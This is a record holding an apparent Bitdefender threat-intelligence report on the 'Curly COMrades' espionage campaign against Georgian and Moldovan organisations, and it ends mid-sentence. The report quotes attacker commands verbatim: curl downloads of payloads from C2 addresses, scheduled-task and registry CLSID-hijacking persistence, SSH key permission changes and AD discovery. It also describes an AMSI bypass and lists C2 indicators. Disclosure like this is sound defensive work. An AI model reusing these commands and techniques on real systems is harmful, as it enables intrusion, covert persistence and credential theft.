{
	"id": "79bb4567-2b72-4294-9ef5-8c52ad420722",
	"created_at": "2026-04-06T00:17:30.306932Z",
	"updated_at": "2026-04-10T03:36:00.764905Z",
	"deleted_at": null,
	"sha1_hash": "d6b6a4666e1efbf60c50e0c656e5a0079fba7447",
	"title": "Curly COMrades: A New Threat Actor Targeting Geopolitical Hotbeds",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1178449,
	"plain_text": "Curly COMrades: A New Threat Actor Targeting Geopolitical Hotbeds\r\nBy Victor Vrabie\r\nArchived: 2026-04-05 14:21:26 UTC\r\nThis research from Bitdefender Labs details a cluster of malicious activity we've been tracking since mid-2024. It uncovers a\r\nnew threat actor group we’ve named Curly COMrades, operating to support Russian interests, that's been targeting critical\r\norganizations in countries facing significant geopolitical shifts. We observed them launching focused attacks against judicial\r\nand government bodies in Georgia, as well as an energy distribution company in Moldova. \r\nThe group's primary objective is to maintain long-term access to target networks and steal valid credentials. This allows\r\nthem to move around the network, collect data, and send it out. They repeatedly attempted to extract the NTDS database\r\nfrom domain controllers, the primary repository for user password hashes and authentication data in a Windows network.\r\nAdditionally, they attempted to dump LSASS memory from specific systems to recover active user credentials, potentially\r\nplain-text passwords, from machines where users were logged on. \r\n\"Curly COMrades\" heavily rely on establishing strong access points. They use proxy tools like Resocks, SSH, and Stunnel\r\nto establish multiple entry points into internal networks. Through these established proxy relays, they frequently executed\r\nremote commands, often through tools like Atexec. \r\nFor persistent access, attackers deployed a new backdoor we've named MucorAgent, using a very smart technique: hijacking\r\nCLSIDs to target NGEN (Native Image Generator) for persistence. NGEN, a default Windows .NET Framework component\r\nthat pre-compiles assemblies, provides a mechanism for persistence via a disabled scheduled task.\r\nThis task appears inactive, yet the operating system occasionally enables and executes it at unpredictable intervals (such as\r\nduring system idle times or new application deployments), making it a great mechanism for restoring access covertly. Given\r\nthis unpredictability, it is probable that a secondary, more predictable mechanism for executing this specific task also\r\nexisted. \r\nThey also strategically use compromised, but legitimate websites as traffic relays. This tactic complicates detection and\r\nattribution by blending malicious traffic with legitimate network activity. By routing command-and-control (C2) and data\r\nexfiltration through seemingly harmless sites, they bypass defenses that trust known domains and hide their true\r\ninfrastructure. It's very likely that what we've observed is just a small part of a much larger network of compromised web\r\ninfrastructure they control. \r\nThreat Actor Naming \r\nIn our extensive analysis, we looked for strong overlaps with known threat actor groups. While we noted minor similarities,\r\nlike the incidental use of rar.exe for archiving or the System.Management.Automation namespace for PowerShell code\r\nexecution, these are common tactics shared by many actors. Ultimately, we found insufficient evidence to confidently\r\nattribute this campaign to any existing group. To avoid misleading the community with low-confidence attribution, we chose\r\nto designate them as a new, distinct threat actor: ‘Curly COMrades’. \r\nOur decision to name this threat actor \"Curly COMrades\" is rooted in two primary factors: their operational methodologies\r\nand a broader industry concern. \r\nTheir technical indicators heavily feature the use of curl.exe for C2 communications and data exfiltration, and a significant\r\naspect of their tooling involves the hijacking of Component Object Model (COM) objects. Beyond these technical aspects,\r\nthe group's operations align with the geopolitical goals of the Russian Federation. \r\nThe second, and perhaps more contentious, aspect of 'Curly COMrades' is its deliberately derogatory nature. We recognize\r\nthat the cybersecurity industry has a long-standing trend of assigning cool, fancy, or even mythological names to threat\r\nactors. While memorable, we—and many others in the cybersecurity community—believe this inadvertently glorifies and, at\r\ntimes, even markets malicious actors. \r\nBy choosing a name like 'Curly COMrades,' we aim to de-glamorize cybercrime, stripping away any perception of\r\nsophistication or mystique. They are not 'fancy bears' or 'wizard spiders'; they are simply malicious actors engaged in\r\ndisruptive and harmful behavior. \r\nWe hope this choice sparks a wider conversation within the cybersecurity community about naming conventions,\r\nencouraging a shift towards more practical and less sensational designations. \r\nTechnical Analysis \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 1 of 18\n\nSuspicious activity was first detected in late 2024 with an attempt to deploy a resocks client. This triggered an investigation,\r\nwhich ultimately uncovered a wider espionage campaign. Forensic analysis of the affected systems revealed additional\r\ncompromised machines and credentials, highlighting the attackers' extensive efforts to maintain persistent access. \r\nThe attackers installed reverse proxy agents across multiple systems and leveraged stolen credentials to access, collect,\r\narchive, and exfiltrate internal data. They repeatedly attempted to extract the NTDS database from domain controllers and\r\ndump LSASS memory on select systems to maintain their access.  \r\nAfter several resocks tunnels were taken down, the attackers tried to reestablish access by deploying a SOCKS5 server on an\r\ninternet-facing host as an alternative entry point. They then attempted to set up new tunnels between the victim network and\r\ntheir infrastructure using tools like ssh.exe and stunnel. Their persistent efforts to regain access underscore a common tactic\r\nof advanced threat actors: establishing multiple routes for persistence. \r\nRemote commands were executed through reverse proxy relays using the stolen credentials—likely via atexec from the\r\nImpacket toolkit or a similar tool. The attackers' focus was on harvesting credentials and browser data. During this period, a\r\npreviously unseen three-stage malware component—MucorAgent—was identified within their toolkit. This malware was\r\ndesigned to maintain persistence, execute PowerShell scripts, and exfiltrate output via curl.exe. \r\nAnother important tactic observed in this campaign is strategic use of compromised, legitimate websites as traffic relays, a\r\ntactic that significantly complicates detection and attribution. This approach allows them to blend malicious traffic with\r\nnormal network activity, making it harder for security tools to flag their communications. By routing C2 and data exfiltration\r\nthrough seemingly benign sites, they evade defenses that trust known domains and obscure their true infrastructure. \r\nThe sections below outline the observed threat actor activity as identified through forensic analysis and investigation. \r\nProxy Relays \r\nProxy tools were a core component of these intrusions. When combined with valid privileged credentials, they gave the\r\nattackers unrestricted access and control over the affected networks. \r\nResocks \r\nThe most frequently observed proxy was resocks, a readily accessible proxy tool from GitHub. Resocks essentially turns a\r\ncompromised computer into a secure relay point, allowing attackers to route their traffic through that internal system as if\r\nthey were directly on the network. The code samples recovered from the compromised systems had been built using garble,\r\nan obfuscation utility designed for Go binaries. Garble works by scrambling and encrypting parts of the program's code,\r\nmaking it harder for security analysts to reverse-engineer it and understand how the tool functions. \r\nResocks acts as a relay point into a compromised network. In this case, Network A represents an attacker, and Network B\r\nrepresents a victim. Source: resocks GitHub readme. \r\nHere's an example of a resocks deployment: the attackers first manually retrieved the client binary using curl. They then\r\ninitiated the resocks tunnel to establish their C2 connection, and finally created a scheduled task to maintain this access\r\npersistently. \r\nResocks – Deployment Commands \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 2 of 18\n\n“cmd.exe\" /C curl.exe -k http://96.30.124[.]103:443/DRM -o c:\\\\programdata\\\\Microsoft\\\\DRM\\\\Server\\\\DRM.exe \u003e\r\nC:\\\\Windows\\\\Temp\\\\khTFMqZA.tmp 2\u003e\u00261 \r\nc:\\\\programdata\\\\Microsoft\\\\DRM\\\\Server\\\\DRM.exe 96.30.124[.]103:443 --key \u003credacted\u003e \r\n\"cmd.exe\" /C schtasks /create /TN \\\\Microsoft\\\\Windows\\\\UpdateOrchestrator\\\\Check_AC /RU System /SC daily /ST\r\n10:42 /TR \"c:\\\\programdata\\\\Microsoft\\\\DRM\\\\Server\\\\DRM.exe 96.30.124[.]103:443 --key \u003credacted\u003e\" /f \u003e\r\nC:\\\\Windows\\\\Temp\\\\tDkDCEDd.tmp 2\u003e\u00261 \r\nAs usual, the choice of paths, scheduled task names, and service names clearly indicates an attempt to blend in with\r\nlegitimate system files and processes. For persistence, the attackers consistently created scheduled tasks and Windows\r\nservices. \r\nResocks - Binaries \r\nc:\\programdata\\drm.exe\r\nc:\\programdata\\microsoft\\drm\\server\\drm.exe \r\nc:\\programdata\\oracle\\java.oracle_jre_usage\\java.exe \r\nc:\\programdata\\oracle\\java\\java.exe \r\nc:\\programdata\\rs.exe \r\nc:\\programdata\\vmware\\vmware tools\\vmtools.exe \r\nResocks - Scheduled Tasks \r\n\\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceProtectionUSB \r\n\\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceToolsUSB \r\n\\Microsoft\\Java\\JavaUpdate \r\n\\Microsoft\\Windows\\UpdateOrchestrator\\Check_AC \r\ntt1 \r\ntest1 \r\nResocks - Windows Services \r\nMsEdgeSvc \r\nJavaSvc \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 3 of 18\n\nOracleJavaSvc \r\nAnalysis of commands found within the scheduled tasks and service definitions revealed that, in most cases, the resocks\r\nclients were configured to communicate over port 443. One instance involving port 8443 was also identified. \r\nResocks - C2 Servers \r\n91.107.174[.]190 \r\n96.30.124[.]103 \r\n194.87.31[.]171 \r\n75.127.13[.]136 \r\n94.131.109[.]91 \r\n207.180.194[.]109 \r\nAvailable evidence indicates that a significant portion of the remote command execution was channeled through their\r\nestablished SOCKS tunnels. Alongside general remote commands, we also observed attempts to execute DCSync. This\r\nattack technique exploits legitimate Active Directory replication functions to trick a Domain Controller into replicating\r\nsensitive information (including user password hashes) to the attacker's machine , demonstrating the Curly COMrades'\r\nappetite for credentials and further lateral movement. \r\nIn one instance, the resocks client located in Moldova initiated an HTTP request to a Redmine server over port 3000 in\r\nUkraine. Redmine is a legitimate, open-source web-based project management application, widely used by businesses, that\r\nuse port 3000 by default. This behavior strongly indicates that the Redmine server in Ukraine was likely compromised by\r\nthe attackers and then repurposed, potentially allowing the attackers to circumvent geolocation-based access restrictions. \r\nSOCKS5 Binary \r\nAnother proxy tool, believed to have been deployed alongside the resocks tunnels as an alternative access point on an\r\ninternet-exposed system, was identified as a SOCKS5 server binary, adapted from an open-source project hosted on GitHub.\r\nThis tool binds to 0.0.0.0:55333 (with a later identified sample binding to port 55334; MD5:\r\n44a57a7c388af4d96771ab23e85b7f1e), enabling immediate proxying of network traffic after execution. Before the server\r\nstarts, the application console window is hidden through calls to the AllocConsole(), FindWindowA(), and ShowWindow()\r\nAPIs using the SW_HIDE parameter. \r\nIn total, two distinct samples of this SOCKS server variant were identified across separate compromised hosts. \r\nSOCKS5 Proxy - Binaries \r\nc:\\programdata\\hp.exe \r\nc:\\programdata\\microsoft\\edgeupdate\\msedge.exe \r\nc:\\programdata\\microsoft\\mf\\mf.exe \r\nc:\\programdata\\ssh\\sshelp.exe \r\nc:\\programdata\\symantec\\symantec.exe \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 4 of 18\n\nPersistence for one instance of this SOCKS5 server was achieved through the scheduled task names\r\n\\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicesUSB. \r\nSSH + Stunnel \r\nThe most recently investigated activity revealed a shift in the technique to establish SOCKS proxy capabilities. Instead of\r\nrelying on custom proxy binaries, ssh.exe was used for remote port forwarding, while tstunnel.exe—a component of the\r\nStunnel suite — was used to encrypt the TCP traffic. This approach was likely intended to obfuscate the SSH\r\ncommunication and evade network-based detection mechanisms. \r\nFirst, the tstunnel.exe (MD5: 063770f7e7eb52d83c97aa63c0a6f8a6) was executed with a configuration directing it to bind\r\nto the localhost interface on a high-numbered port, such as 52437. The configuration instructed the tool to encapsulate the\r\nlocal TCP traffic and send it to the remote compromised server, creating an encrypted communication channel.\r\nTstunnel Location  Corresponding Config \r\nC:\\programdata\\Samsung\\Printer\\Printer.exe  C:\\programdata\\Samsung\\Printer\\service.conf \r\nC:\\programdata\\microsoft\\crypto\\rsa\\Certutils.exe  C:\\programdata\\microsoft\\crypto\\rsa\\service.conf \r\nNext, ssh.exe was copied to an unusual location, like C:\\ProgramData\\Microsoft\\UEV\\Templates\\Template.exe. A special\r\nconfiguration file was also put in place. This file was set up to enable remote port forwarding, allowing ssh.exe to\r\ncommunicate with the SSH server through a local port opened by tstunnel.exe. File permissions were then adjusted to make\r\nsure ssh.exe could run successfully. implemented\r\nicacls C:\\programdata\\Microsoft\\UEV\\templates\\SettingsLocationTemplate2013B.xsd /remove *S-1-15-2-1 *S-1-15-2-\r\n2 \r\nicacls C:\\programdata\\Microsoft\\UEV\\templates\\SettingsLocationTemplate2013B.xsd /remove *S-1-5-11 *S-1-5-32-\r\n544 *S-1-5-32-545 \r\nicacls C:\\programdata\\Microsoft\\UEV\\templates\\SettingsLocationTemplate2013B.xsd /inheritance:d \r\nThe binary was then launched with the -F option to load the custom configuration, followed by parameters that activated the\r\nremote forwarding functionality. \r\n\"C:\\programdata\\Microsoft\\UEV\\templates\\Template.exe\" -F\r\nC:\\programdata\\Microsoft\\UEV\\templates\\SettingsLocationTemplate2013C.xsd start \r\nIn a separate attempt to configure SSH traffic forwarding, the use of a custom configuration file was avoided. Instead, a\r\ndefault configuration file was placed for the SYSTEM user. File permissions required for this setup were adjusted through\r\nthe execution of a batch script located at C:\\ProgramData\\ch_prm.bat: \r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\id_rsa /c /t/Inheritance:d\r\nTakeOwn /F c:\\windows\\system32\\config\\systemprofile\\.ssh\\id_rsa\r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\id_rsa /c /t /Remove:g \"Authenticated Users\"\r\nBUILTIN\\Administrators BUILTIN Everyone Users \r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\id_rsa \r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\config /c /t /Inheritance:d \r\nTakeOwn /F c:\\windows\\system32\\config\\systemprofile\\.ssh\\config \r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\config /c /t /Remove:g \"Authenticated Users\"\r\nBUILTIN\\Administrators BUILTIN Everyone Users \r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\config \r\nNext, the ssh.exe binary was copied to C:\\Program Files (x86)\\Google\\chrome.exe and executed using a configuration\r\nprofile “Update” that was likely predefined in the default config. The selection of the destination path, executable name, and\r\nprofile designation appears to have been deliberately made to blend seamlessly with legitimate system behavior.\r\n\"cmd.exe\" /C copy /y c:\\\\windows\\\\system32\\\\OpenSSH\\\\ssh.exe \"c:\\\\program files (x86)\\\\Google\\\\chrome.exe\" \u003e\r\nc:\\\\Programdata\\\\WindowsUpdateTask_B.tmp 2\u003e\u00261 \r\n\"c:\\\\program files (x86)\\\\Google\\\\chrome.exe\" Update -N \r\nc:\\\\Program Files (x86)\\\\Google\\\\GoogleUpdate.exe\" \r\nCurlCat \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 5 of 18\n\nAn interesting artifact associated with this execution—presumably intended to support traffic forwarding—was the\r\nspawning of a secondary process, C:\\Program Files (x86)\\Google\\GoogleUpdate.exe (MD5:\r\ndd253f7403644cfa09d8e42a7120180d), by the ssh.exe binary. Analysis of GoogleUpdate.exe revealed that it obtained\r\nhandles to the standard input and output streams and facilitated bidirectional data transfer between these streams and C2\r\nserver over HTTPS. The binary effectively behaves in a manner similar to netcat and is likely used in conjunction with the\r\nSSH ProxyCommand option to relay traffic through the specified intermediary.  \r\nThe tool is assessed to be a custom implementation, with several relevant details identified through static analysis. It is\r\nstatically linked with the libcurl library, which is used to establish communication with a hardcoded compromised site\r\n\u003credacted\u003e[.]ge — likely hosted on a PHP and WordPress stack. HTTP requests issued by the tool contain hardcoded\r\nheaders, indicating a predefined communication pattern with the C2 infrastructure: \r\nHost: \u003credacted\u003e.ge \r\nAccept: */* \r\nAccept-Encoding: gzip, deflate \r\nConnection: keep-alive \r\nContent-type: application/octet-stream \r\nCookie: PHPSESSID=\u003crandom base64 encoded string\u003e \r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0\r\nSafari/537.36 \r\nAn important part of the tool's setup involves creating a custom character substitution map. This map is derived from the\r\nfollowing string. \r\nH2IWw5/AOhBJ6zQmxreqlVFYgfckCEnbABCDEFGHIJKLMNOPQRSTUVWXYZabcdefKDPL8t0N9T3UMRo1XajZ7Gp+ydvSisu4ghijklmnopqrs\r\nThis 128-character string is then divided into four 32-character segments. From these segments, two distinct 64-character\r\nstrings are constructed through concatenation: \r\nThe substitution alphabet is created by joining characters 0-31 and characters 64-95 \r\nResult: H2IWw5/AOhBJ6zQmxreqlVFYgfckCEnbKDPL8t0N9T3UMRo1XajZ7Gp+ydvSisu4 \r\nThe standard Base64 alphabet is created by joining characters 32-63 and characters 96-127 \r\nResult: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ \r\nThese two 64-character strings are then used to establish a one-to-one character mapping. This means each character from\r\nthe Standard Base64 Alphabet (the second string) is replaced by the character found at the exact corresponding position in\r\nthe Substitution Alphabet (the first string). For example, if the tool needs to encode a character that would normally be 'A' in\r\nstandard Base64 (the first character of the standard alphabet), it would instead use 'H' (the first character of the custom\r\nsubstitution alphabet). This effectively scrambles or \"encodes\" the data using a custom alphabet, making it harder for\r\ngeneric decoders to interpret. \r\nThe tool retrieves content from standard input using PeekNamedPipe() and ReadFile(), then encodes it. The encoded data is\r\nsent via an HTTPS request, and the server's response is decoded using the same logic before being written to standard output\r\nvia the WriteFile() API. \r\nAnother sample discovered at the same location (C:\\Program Files (x86)\\Google\\GoogleUpdate.exe) communicated with the\r\ndomain \u003credacted\u003e[.]md as its C2 server. Its structure and behavior closely resembled the previously mentioned site,\r\nsuggesting it was also configured to operate as an intermediary—likely a compromised web server functioning as a proxy\r\nbetween the victim machine and attacker-controlled infrastructure. \r\nRuRat \r\nAlthough the attackers had already achieved persistence through valid credentials and sustained network access via proxy\r\nrelays, they implemented an additional method for continued access: deploying the legitimate Remote Monitoring and\r\nManagement (RMM) tool, Remote Utilities (RuRat). This was initiated by %COMMON_APDATA%\\run.bat, which created\r\nRuRat's default installation directory and extracted the tool's contents into it. \r\nRMM – RuRat Deployment \r\nmkdir \"c:\\Program Files (x86)\\Remote Utilities - Host\" \r\n\"c:\\programdata\\rar.exe\" x c:\\programdata\\RemUT.rar \"c:\\Program Files (x86)\\Remote Utilities - Host\" \r\nsc create RemUtSvc binPath= \"\\\"c:\\Program Files (x86)\\Remote Utilities - Host\\rutserv.exe\\\" -run_agent\" start=\r\ndelayed-auto error= ignore \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 6 of 18\n\nreg import c:\\programdata\\cfg.reg \r\ndel /f /q c:\\programdata\\cfg.reg \r\nMucorAgent  \r\nA complex and previously unknown malware—designated MucorAgent—was identified on multiple systems within one of\r\nthe targeted organizations. \r\n It was engineered as a .NET stealthy tool capable of executing an AES-encrypted PowerShell script and uploading the\r\nresulting output to a designated server. Although no PowerShell payloads were recovered, the design of the malware\r\nsuggests that its execution was intended to occur periodically—most likely for the purpose of data collection and\r\nexfiltration. \r\nThe malware consists of three distinct components. The first is a .NET assembly that hijacks a legitimate COM handler\r\nassociated with the CLSID {de434264-8fe9-4c0b-a83b-89ebeebff78e}. This initial component is responsible for loading a\r\nsecond .NET stage dynamically. The second stage proceeds to decrypt and execute the third stage alongside another\r\nassembly responsible for AMSI patching in order to avoid the PowerShell script payload being detected. \r\nThe final payload searches for specific files (index.png or icon.png) within a designated folder, decrypts an embedded\r\nPowerShell script, and executes it using System.Management.Automation namespace without invoking the PowerShell.exe\r\nprocess—thereby reducing visibility. The script’s output is then AES-encrypted and wrapped with a PNG header and footer\r\nto masquerade as a legitimate image file. This disguised output is subsequently exfiltrated to an attacker-controlled server\r\nusing curl.exe. \r\nDeployment \r\nThe typical method used to deploy MucorAgent and establish persistence involves the execution of reg.exe commands to\r\nhijack the CLSID. This was done either manually or by placing all the necessary commands into a single batch file,\r\ncommonly named C:\\ProgramData\\r.bat: \r\nMucorAgent – CLSID Hijacking \r\nreg add HKEY_USERS\\\u003cSID\u003e\\SOFTWARE\\Classes\\CLSID\\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\\InprocServer32 /t REG_SZ /d \"C:\\\\Windows\\\\System32\\\\mscoree.dll\" /F \r\nreg add HKEY_USERS\\\u003cSID\u003e\\SOFTWARE\\Classes\\CLSID\\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\\InprocServer32 /v Assembly /t REG_SZ /d \"TaskLauncher, Version=1.0.0.0, Culture=neutral,\r\nPublicKeyToken=null\" /F \r\nreg add HKEY_USERS\\\u003cSID\u003e\\SOFTWARE\\Classes\\CLSID\\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\\InprocServer32 /v Class /t REG_SZ /d \"TaskLauncher.TaskHandler\" /F \r\nreg add HKEY_USERS\\\u003cSID\u003e\\SOFTWARE\\Classes\\CLSID\\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\\InprocServer32 /v CodeBase /t REG_SZ /d \"C:\\\\ProgramData\\\\Intel\\\\Logs\\\\Data\\\\TaskLauncher.dll\" /F \r\nreg add HKEY_USERS\\\u003cSID\u003e\\SOFTWARE\\Classes\\CLSID\\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\\InprocServer32 /v RuntimeVersion /t REG_SZ /d \"v4.0.30319\" /F \r\nThe COM handler {de434264-8fe9-4c0b-a83b-89ebeebff78e} is linked to the scheduled task named “.NET Framework\r\nNGEN v4.0.30319 Critical.” While this task is typically disabled by default, it is periodically enabled. \r\nTo explain, NGEN (Native Image Generator) is a Microsoft .NET tool designed to boost the performance of .NET\r\napplications. It works by pre-compiling an application's intermediate code into native machine code, storing it for faster\r\nloading later and reducing startup times and memory usage. NGEN tasks are usually executed in the background during\r\nsystem idle times or triggered after specific events like the deployment of new .NET applications, updates to the .NET\r\nFramework, or the installation/updates of .NET-reliant applications. This periodic enablement ensures that .NET applications\r\nremain optimized over time. \r\nBy hijacking this CLSID, threat actors gain a unique persistence mechanism, allowing them to restore their MucorAgent\r\nbackdoor during one of these periodic NGEN optimization scans. A critical advantage of this method is stealth and\r\nexecution under the highly privileged SYSTEM account. This particular technique, leveraging CLSID hijacking in\r\nconjunction with NGEN, is unprecedented in our observations. \r\nHowever, a notable drawback of this approach is the inherent unpredictability of NGEN task execution times. For this\r\nreason, we believe the attackers likely employed another, more reliable task or trigger in parallel, either to directly execute\r\nMucorAgent or to trigger the NGEN optimization process on-demand. This hypothesis is further supported by another task\r\ncreation command immediately following the reg add commands: \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 7 of 18\n\nschtasks /create /tn \"\\\\Mozilla\\\\Browser.VisualUpdate\" /xml C:\\\\programdata\\\\Curl.TaskHandler.xml \r\nOne step in the setup process involved delivering the payload intended for execution by MucorAgent. This payload was an\r\nencrypted data blob, disguised as a .png file (though lacking actual image headers). In one observed instance, the attackers\r\nused curl.exe to download this file directly from a compromised website. The file was then placed in the specific location\r\nwhere MucorAgent was configured to find and execute it. \r\ncurl.exe -k http://\u003credacted\u003e[.]org:443/index.png -o c:\\users\\\r\n\u003credacted\u003e\\appdata\\roaming\\Microsoft\\Windows\\Templates\\Curl\\index.png\r\nAnother COM handler hijacking was also identified, targeting the CLSID {613fba38-a3df-4ab8-9674-5604984a299a},\r\nwhich corresponds to NGenTaskLauncher.CriticalTaskHandler64. \r\nInternals \r\nThe first stage of MucorAgent exposes a class named TaskLauncher, which inherits from TaskHandlerBase, enabling it to be\r\nloaded by taskhostw.exe. The core functionality is implemented within the Start() method, which receives a data parameter,\r\nverifies the presence of the encrypted payload, and proceeds to invoke the second stage if the payload is found. \r\nIf the primary payload is not found, the Launch() function is invoked instead. This function initiates the curl.exe process,\r\nproviding it with the -K image parameter. This parameter instructs curl to use the file “image” (located in the\r\n%APPDATA%\\Microsoft\\Windows\\Templates\\Curl folder) as its configuration file. This action is likely intended to upload\r\nthe results produced by the previous PowerShell script and to retrieve the next PowerShell script for execution. \r\nIf a file with the payload is present, the next step involves loading the second stage. This is accomplished by configuring an\r\nAppDomainSetup and creating an instance of a .NET assembly using CreateInstanceFrom(), specifying the assembly name\r\nTaskLauncher.TaskHandler and the type \"TaskLauncher, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\". This\r\noperation results in the loading of TaskLauncher.dll from %COMMON_APPDATA%\\SOShared\\Logs\\User\\FE8C4219-\r\nA639-46F6-AC97-8035FF5A4A85\\Packages\\, and the invocation of the TaskHandler constructor, where the logic for the\r\nsecond stage is implemented. \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 8 of 18\n\nIt’s important to note that the Properties Date, Form, Path, and Count are set for the second stage and have the following\r\nmeaning:\r\nDate\r\nContains the AES-encrypted third stage, along with the assembly responsible for implementing AMSI patch\r\nfunctionality.\r\nForm The AES key\r\nPath The directory where the encrypted PowerShell payload is located \r\nCount The offset delimiting the AMSI patch binary from the third stage \r\nIn other samples analyzed, the Date property is absent, and the third-stage payload is read directly from a file specified by a\r\nhardcoded path within the second stage. The AES key and Count value are extracted and used within the Decode() method\r\nto decrypt the third stage, employing the AesManaged algorithm with both the key and initialization vector (IV) set to the\r\nsame value obtained from the Form property. The decryption process results in a GZip archive containing the AMSI patch\r\nassembly concatenated with the third and final stage.\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 9 of 18\n\nEach invocation of the Show() method results in the loading and execution of a type from the assembly provided as input. \r\nThe initial invocation of the Show method is intended to execute the AMSI patch assembly. As with other payloads, the core\r\nlogic is implemented within the TaskLauncher.TaskHandler class, where the class constructor calls a static Main() function\r\nresponsible for applying the AMSI bypass. The bypass technique employed is similar to the method described in this\r\nanalysis and involves overwriting the address of the AmsiScanBuffer function within a .NET utility library with a dummy\r\nfunction. This modification allows the payload to evade inspection by the Antimalware Scan Interface (AMSI), thereby\r\nbypassing detection mechanisms. \r\nThe third and final stage utilizes the Form and Path properties to retrieve the AES key and the directory containing the\r\nencrypted PowerShell script. As illustrated in the image below, the Show() function is invoked with parameters that include\r\nthis information, along with the index.png file—expected to contain the encrypted script—and the string \"error.jpg\", which\r\ndesignates the output file where the execution results will be written. \r\nThe Show() method reads the encrypted script, decrypts it using the AesManaged algorithm (AES in CBC mode) with both\r\nthe key and initialization vector (IV) set to the same value, and subsequently decompresses the result using GZIP. The\r\nresulting buffer is supplied as input to a PowerShell object instance from the System.Management.Automation namespace.\r\nThe script is executed, and the output is serialized into a byte array, which is then passed to an encoding routine that\r\nperforms GZIP compression followed by AES encryption.  \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 10 of 18\n\nThe SetData() method then processes the encrypted output by appending a PNG header and footer, after which the resulting\r\ndata is written to the designated output file, error.jpg. \r\nAlthough neither the encrypted PowerShell script nor the corresponding output file could be recovered, the design of the\r\nMucorAgent suggests that it was likely intended to function as a backdoor capable of executing payloads on a periodic basis.\r\nEach encrypted payload is deleted after being loaded into memory, and no additional mechanism for regularly delivering\r\nnew payloads was identified. Additional payloads may have been retrieved by the same curl.exe instance believed to be\r\nresponsible for uploading the execution results. \r\nTwo potential C2 servers associated with the MucorAgent were identified: \u003credacted\u003e[.]org and 45.43.91[.]10. The first, a\r\ndomain, was observed in a curl command and is assessed to correspond to the manual retrieval of an encrypted PowerShell\r\npayload. The second, an IP address, appeared in a manually executed curl command likely intended to verify connectivity.\r\nThis activity was observed immediately following the execution of the scheduled task believed to initiate the first stage of\r\nthe MucorAgent. \r\nThe locations where the first, second and third stages were deployed during the attacks are provided in the table below: \r\nMucorAgent – Binaries (2nd \u0026 3rd stages) \r\nc:\\programdata\\intel\\logs\\data\\tasklauncher.dll \r\nc:\\programdata\\gretech\\gomplayer\\appconfig \r\nc:\\programdata\\kmsautos\\bin\\driver\\x64wdv\\windivert.conf \r\nc:\\programdata\\driversetuputility\\updater2\\task.conf \r\nc:\\programdata\\usoshared\\logs\\user\\fe8c4219-a639-46f6-ac97-8035ff5a4a85\\packages\\tasklauncher.dll \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 11 of 18\n\nc:\\programdata\\kmsautos\\bin\\driver\\x64wdv\\win \r\nc:\\windows\\microsoft.net\\framework64\\v4.0.30319\\asp.netwebadminfiles\\appconfig\\appconfig \r\nIn several analyzed samples, the folder designated for locating the encrypted PowerShell payload was configured as\r\nC:\\ProgramData\\canon\\OIPPESP, with the payload file named icon.png in certain instances. \r\nDiscovery \r\nAnalysis of all artefacts revealed the methods by which the attackers gathered general information about the compromised\r\nnetwork and systems. On specific hosts, depending on operational requirements, living-off-the-land binaries (LOLBins)\r\nwere employed. A subset of the observed commands is presented below: \r\nDiscovery - LOLBins Commands \r\nnetstat -anob \r\ntasklist /v \r\nsysteminfo \r\nwmic logicaldisk list brief \r\nwmic process get name,commandline,executablepath /format:list \r\narp -a \r\nroute print \r\nipconfig /all \r\nAdditional commands falling under the discovery category were also observed. The command curl ipinfo.io was used to\r\nverify internet connectivity, while netstat -ano -p tcp was executed to identify active proxy tunnels. For network-level\r\ndiscovery of domain controller information, PowerShell cmdlets from the ActiveDirectory module were utilized. \r\nDiscovery - Active Directory Commands \r\npowershell \" Get-ADTrust -Filter *\" \r\npowershell \"get-addomain -identity \u003credacted\u003e\" \r\npowershell \"get-aduser -Filter * -Server \u003credacted\u003e -Properties samaccountname,serviceprincipalnames | ?\r\n{$_.ServicePrincipalNames} | ft\" \r\npowershell \"get-aduser \u003credacted\u003e\" \r\nping \u003cdomain controller\u003e \r\nnet use \u003ccensored\u003e \r\nAvailable evidence suggests that batch files containing multiple commands have been used for discovery. The use of such\r\nscripts was a recurring pattern 